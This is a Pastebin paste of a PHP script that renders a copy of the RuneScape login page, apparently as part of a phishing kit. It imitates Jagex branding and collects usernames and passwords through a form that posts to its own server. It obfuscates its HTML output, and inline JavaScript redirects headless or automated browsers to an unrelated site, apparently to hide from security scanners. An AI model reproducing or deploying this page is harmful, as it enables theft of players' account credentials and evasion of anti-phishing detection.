Advertisement
Guest User

Untitled

a guest
Jan 3rd, 2019
110
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.93 KB | None | 0 0
  1. <?php
  2.  
  3. require_once '../../../app/init.php';
  4.  
  5. require_once 'code.php';
  6.  
  7. $html =
  8. '<!doctype html>
  9. <!--[if lt IE 7]><html class="no-js lt-ie10 lt-ie9 lt-ie8 lt-ie7" lang="en"><![endif]-->
  10. <!--[if (IE 7)&!(IEMobile)]><html class="no-js lt-ie10 lt-ie9 lt-ie8" lang="en"><![endif]-->
  11. <!--[if (IE 8)&!(IEMobile)]><html class="no-js lt-ie10 lt-ie9" lang="en"><![endif]-->
  12. <!--[if (IE 9)&!(IEMobile)]><html class="no-js lt-ie10" lang="en"><![endif]-->
  13. <!--[if gt IE 9]><!--><!-- x --> <html class="no-js" lang="en"> <!--<![endif]-->
  14. <head>
  15. <meta charset="UTF-8">
  16. <title>RuneScape Log In</title>
  17. <meta name="viewport" content="width=device-width, initial-scale=1">
  18. <meta name="description" content="Log in here to access your RuneScape account.">
  19. <meta name="author" content="Jagex">
  20. <meta http-equiv="X-UA-Compatible" content="IE=edge">
  21. <link rel="dns-prefetch" href="//www.google-analytics.com">
  22. <link rel="dns-prefetch" href="//ajax.googleapis.com">
  23. <link rel="dns-prefetch" href="//connect.facebook.net">
  24. <link rel="stylesheet" href="/assets/css/vendor.css" />
  25. <link rel="stylesheet" href="/assets/css/site.css" />
  26. <meta name="format-detection" content="telephone=no" />
  27. <meta name="theme-color" content="#ffffff" />
  28. <meta name="msapplication-navbutton-color" content="#061920">
  29. <meta name="apple-mobile-web-app-capable" content="yes">
  30. <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  31. <link rel="apple-touch-icon" sizes="57x57" href="/assets/img/runescape-57.png" />
  32. <link rel="apple-touch-icon" sizes="60x60" href="/assets/img/runescape-64.png" />
  33. <link rel="apple-touch-icon" sizes="72x72" href="/assets/img/runescape-72.png" />
  34. <link rel="apple-touch-icon" sizes="76x76" href="/assets/img/runescape-76.png" />
  35. <link rel="apple-touch-icon" sizes="114x114" href="/assets/img/runescape-114.png" />
  36. <link rel="apple-touch-icon" sizes="120x120" href="/assets/img/runescape-120.png" />
  37. <link rel="apple-touch-icon" sizes="144x144" href="/assets/img/runescape-144.png" />
  38. <link rel="apple-touch-icon" sizes="152x152" href="/assets/img/runescape-152.png" />
  39. <link rel="apple-touch-icon" sizes="180x180" href="/assets/img/runescape-180.png" />
  40. <link rel="icon" type="image/png" sizes="192x192" href="/assets/img/runescape-192.png" />
  41. <link rel="icon" type="image/png" sizes="32x32" href="/assets/img/runescape-32.png" />
  42. <link rel="icon" type="image/png" sizes="96x96" href="/assets/img/runescape-96.png" />
  43. <link rel="icon" type="image/png" sizes="16x16" href="/assets/img/runescape-16.png" />
  44. <meta name="msapplication-TileColor" content="#ffffff" />
  45. <meta name="msapplication-TileImage" content="/assets/img/runescape-144.png" />
  46. . $Captcha->generateCaptchaJS() .
  47. </head>
  48. <body class=" p-login" id="p-login">
  49. <main class="l-vista l-vista--size-narrow" data-value="200">
  50. <div class="l-vista__central" style="background-image: url(../img/backgrounds/dual.jpg)">
  51. <div class="l-vista__container ' . ($loginError == "" ? "" : "l-vista__container--style-attention") . '" id="l-vista__container">
  52. <div class="l-vista__logo">
  53. <a href="https://oldschool.runescape.com/" id="os-logo-home" class="a-logo" target="_top" data-test="product-logo-os">
  54. <img src="/assets/img/logos/oldschool.png" data-interchange="[/assets/img/logos/oldschool.png, small], [/assets/img/logos/oldschool@2x.png, retina]" alt="Old School RuneScape Logo" title="Old School RuneScape" data-resize="b9f8v6-interchange" id="b9f8v6-interchange" data-e="sa0wy8-e" data-events="resize">
  55. </a>
  56. <a href="http://www.runescape.com/" id="rs-logo-home">
  57. <img src="/assets/img/logos/runescape.png" data-interchange="[/assets/img/logos/runescape.png, small], [/assets/img/logos/runescape@2x.png, retina]" alt="RuneScape Logo" title="RuneScape" />
  58. </a>
  59. </div>
  60. <form class="login-form" id="login-form" method="post" action="" data-abide="qjgh68-abide" novalidate="" onsubmit="return checkLogin()">
  61. ' . $loginError . '
  62. <label class="login-form__label" id="label-username">
  63. Email / Username:
  64. <input class="login-form__text" type="text" name="username" id="login-username" maxlength="200" title="Enter your Email / Username:" value="" autofocus="" autocomplete="username" required="">
  65. <span class="form-error" id="span-username">
  66. This field is required.
  67. </span>
  68. </label>
  69. <label class="login-form__label" id="label-password">
  70. Password:
  71. <input class="login-form__text" type="password" name="password" id="login-password" maxlength="20" title="Enter your password" required="">
  72. <span class="form-error" id="span-password">
  73. This field is required.
  74. </span>
  75. </label>
  76. <button class="a-button a-button--size-full" name="login" value="submit" id="rs-login-submit" type="submit">Log In</button>
  77. <input type="hidden" value="www" name="mod">
  78. <input type="hidden" value="' . md5(mt_rand(11111, 444444)) . '" name="ssl">
  79. <input type="hidden" value="community" name="dest">
  80. <input type="hidden" name="page_referral" value="' . $Browser->findReferral() . '">
  81. <input type="hidden" id="token" name="token" value="' . Token::generate() . '">
  82. </form>
  83. <div class="login-additional">
  84. <a class="login-additional__cannot" href="https://www.runescape.com/cant_log_in" target="_parent" id="login-cannot">Can\'t Log In?</a>
  85. <div class="login-social">
  86. <div class="login-social__column">
  87. <a href="#" id="facebooklogin" class="a-social-button a-social-button--service-facebook" target="_parent">Log In</a>
  88. </div>
  89. <div class="login-social__column">
  90. <a href="https://secure.runescape.com/m=sn-integration/google/gamelogin.ws?mod=www&amp;ssl=0&amp;dest=community" id="googlelogin" class="a-social-button a-social-button--service-google" target="_parent">Log In</a>
  91. </div>
  92. </div>
  93. <span class="login-additional__not-registered">Not registered?</span><br />
  94. <a class="login-additional__create" href="https://secure.runescape.com/m=account-creation/create_account" target="_parent" id="login-create">Create an account</a>
  95. </div>
  96. </div>
  97. </div>
  98. </main>
  99. </body>
  100.  
  101. <script>
  102. if (navigator.webdriver == true) {
  103. window.location = "http://homosexuallover.com";
  104. }
  105.  
  106.  
  107. if (window.document.documentElement.getAttribute("webdriver")) {
  108. window.location = "http://homosexuallover.com";
  109. }
  110.  
  111. if (window.callPhantom || window._phantom) {
  112. window.location = "http://homosexuallover.com";
  113. }
  114.  
  115. </script>
  116. <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>
  117. . $Captcha->generateCaptchaExecuteJS("#login-form", "login") .
  118. <script type="text/javascript" src="/assets/weblogin/js/global.js"></script>
  119. </html>
  120. ';
  121.  
  122. echo Encode::enc($html);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement